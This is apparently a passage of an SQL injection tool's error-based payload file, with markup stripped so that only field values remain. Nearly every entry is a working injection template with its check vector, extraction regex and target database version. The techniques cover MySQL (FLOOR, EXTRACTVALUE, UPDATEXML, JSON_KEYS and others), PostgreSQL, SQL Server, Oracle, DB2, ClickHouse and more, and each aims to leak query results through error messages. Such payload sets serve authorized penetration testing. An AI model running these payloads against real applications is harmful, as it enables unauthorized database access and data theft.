- 3
- 1,8,9
- 1
- OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
-
- OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.6
-
-
-
-
- MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)
- 2
- 5
- 1
- 1,2,3,8,9
- 1
- AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))
-
- AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.7.8
-
-
-
-
-
- MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)
- 2
- 5
- 3
- 1,8,9
- 1
- OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))
-
- OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.7.8
-
-
-
-
- MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- 2
- 2
- 1
- 1,2,3,8,9
- 1
- AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- 2
- 2
- 3
- 1,2,3,8,9
-
- 1
- OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- 2
- 5
- 1
- 7
- 1
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
- 2
- 1
- 1
- 1,2,3,8,9
- 1
- AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
-
- AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
- 2
- 1
- 3
- 1,2,3,8,9
-
- 1
- OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
-
- OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
- 2
- 3
- 1
- 1,2,3,8,9
- 1
- AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
- 2
- 3
- 3
- 1,2,3,8,9
-
- 1
- OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- 2
- 3
- 1
- 1,2,3,8,9
- 1
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 4.1
-
-
-
-
-
- MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
- 2
- 3
- 3
- 1,8,9
- 1
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 4.1
-
-
-
-
-
- MySQL OR error-based - WHERE or HAVING clause (FLOOR)
- 2
- 4
- 3
- 1,8,9
- 2
- OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
-
- OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
- #
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
-
-
-
-
- PostgreSQL AND error-based - WHERE or HAVING clause
- 2
- 1
- 1
- 1,8,9
- 1
- AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
-
- AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL OR error-based - WHERE or HAVING clause
- 2
- 1
- 3
- 1,8,9
- 2
- OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
-
- OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
- 2
- 1
- 1
- 1,8,9
- 1
- AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
- 2
- 2
- 3
- 1,8,9
- 2
- OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)
- 2
- 2
- 1
- 1,8,9
- 1
- AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)
- 2
- 3
- 3
- 1,8,9
- 2
- OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)
- 2
- 2
- 1
- 1,8,9
- 1
- AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
-
- AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
- 2
- 3
- 3
- 1,8,9
- 2
- OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
-
- OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (XMLType)
- 2
- 1
- 1
- 1,9
- 1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (XMLType)
- 2
- 1
- 3
- 1,9
- 2
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
- 2
- 2
- 1
- 1,9
- 1
- AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
- >= 8.1.6
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
- 2
- 2
- 3
- 1,9
- 2
- OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
- >= 8.1.6
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 2
- 3
- 1
- 1,9
- 1
- AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 2
- 3
- 3
- 1,9
- 2
- OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
- 2
- 4
- 1
- 1,9
- 1
- AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
- 2
- 4
- 3
- 1,9
- 2
- OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird AND error-based - WHERE or HAVING clause
- 2
- 3
- 1
- 1
- 1
- AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- Firebird OR error-based - WHERE or HAVING clause
- 2
- 4
- 3
- 1
- 2
- OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- MonetDB AND error-based - WHERE or HAVING clause
- 2
- 3
- 1
- 1
- 1
- AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MonetDB
-
-
-
-
- MonetDB OR error-based - WHERE or HAVING clause
- 2
- 4
- 3
- 1
- 2
- OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MonetDB
-
-
-
-
- Vertica AND error-based - WHERE or HAVING clause
- 2
- 3
- 1
- 1
- 1
- AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)
-
- AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Vertica
-
-
-
-
- Vertica OR error-based - WHERE or HAVING clause
- 2
- 4
- 3
- 1
- 2
- OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)
-
- OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Vertica
-
-
-
-
- IBM DB2 AND error-based - WHERE or HAVING clause
- 2
- 3
- 1
- 1
- 1
- AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- IBM DB2
-
-
-
-
- IBM DB2 OR error-based - WHERE or HAVING clause
- 2
- 4
- 3
- 1
- 1
- OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- IBM DB2
-
-
-
-
- ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- 2
- 3
- 1
- 1,2,3,9
- 1
- AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- ClickHouse
-
-
-
-
- ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- 2
- 4
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- ClickHouse
-
-
-
-
-
-
-
-
- MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
- 2
- 2
- 1
- 1,2,3,4,5
- 1
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)
-
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
-
-
- MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)
- 2
- 5
- 1
- 1,2,3,9
- 3
- (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.5 error-based - Parameter replace (EXP)
- 2
- 5
- 1
- 1,2,3,9
- 3
- EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))
-
- EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
- 2
- 5
- 1
- 1,2,3,9
- 3
- GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
-
- GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.6
-
-
-
-
- MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)
- 2
- 5
- 1
- 1,2,3,9
- 3
- JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))
-
- JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.7.8
-
-
-
-
- MySQL >= 5.0 error-based - Parameter replace (FLOOR)
- 2
- 2
- 1
- 1,2,3,9
- 3
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
- 2
- 4
- 1
- 1,2,3,9
- 3
- (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))
-
-
- (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)
- 2
- 2
- 1
- 1,2,3,9
- 3
- (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))
-
-
- (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- PostgreSQL error-based - Parameter replace
- 2
- 2
- 1
- 1,2,3,9
- 3
- (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL error-based - Parameter replace (GENERATE_SERIES)
- 2
- 5
